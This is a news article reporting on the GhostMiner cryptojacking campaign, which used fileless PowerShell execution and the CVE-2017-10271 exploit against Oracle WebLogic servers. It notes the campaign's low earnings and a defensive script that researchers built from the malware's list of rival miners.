In the present world of cryptojacking, it’s quite normal that hackers are trying to use others’ system resources for mining digital currencies. Mining cryptocurrency requires quite a good amount of hardware power to make a profit by the process. Security researchers recently found a cryptojacking campaign (GhostMiner) that used advanced methods for mining more efficiently but went in vain.
Security researchers from Minerva Labs discovered the new strain of crypto mining malware that utilizes PowerShell code for getting access to fileless execution and disable other mining apps from the host for maximum potential. However, despite using the most out of their wit, the creator(s) of the miner program earned merely $200.
According to experts, after running a week-long campaign, the mining campaign, codenamed “GhostMiner”, only earned 1.03 Monero. This is quite smaller than the amounts that hackers earned by exploiting Jenkins RCE flaw (about $3 million).
GhostMiner advanced tricks
Although it sounds pretty funny and a matter of sorrow, GhostMiner is more than that. The failure of earning money doesn’t judge the severity this campaign poses.
For the first time, it appears to be one of its kind. GhostMiner was using fileless execution technique. This method is on the rise in the recent years of malware. It allows a program to run directly from the memory, instead of leaving any file in the disk. This leaves most of the classic antivirus programs for the blind. Fileless execution isn’t a new method, but using it inside GhostMiner tells us that the creator(s) of this campaign put a lot of effort in it.
GhostMiner targeting several servers
For running the mining task, the process needs a hardware. In this scenario, GhostMiner is targeting phpMyAdmin, MS SQL, and Oracle WebLogic servers. However, according to the experts of Minerva Labs, during their analysis, the campaign was only active on Oracle WebLogic servers.
GhostMiner scanned for random IP addresses for WebLogic servers and get access to the server’s system by using the CVE-2017-10271 exploit. After the system is compromised, the program runs 2 PowerShell scripts for launching it into fileless execution mode. After this step, it downloads the additional mining components and a self-defense mechanism.
In addition, GhostMiner also contained a large database of all other processes that would mine in the system. The malware would scan the system and terminate those processes for getting more free hardware resource on the infected host.
Besides GhostMiner, there were more campaigns targeting Oracle WebLogic servers and one of them successfully earned around $226,000 in revenue.
Thanks to GhostMiner creator(s), security researchers developed a PowerShell script using the mining software database found in GhostMiner. The script will help you get rid of all the currently known coin mining processes. You can get the script from GitHub.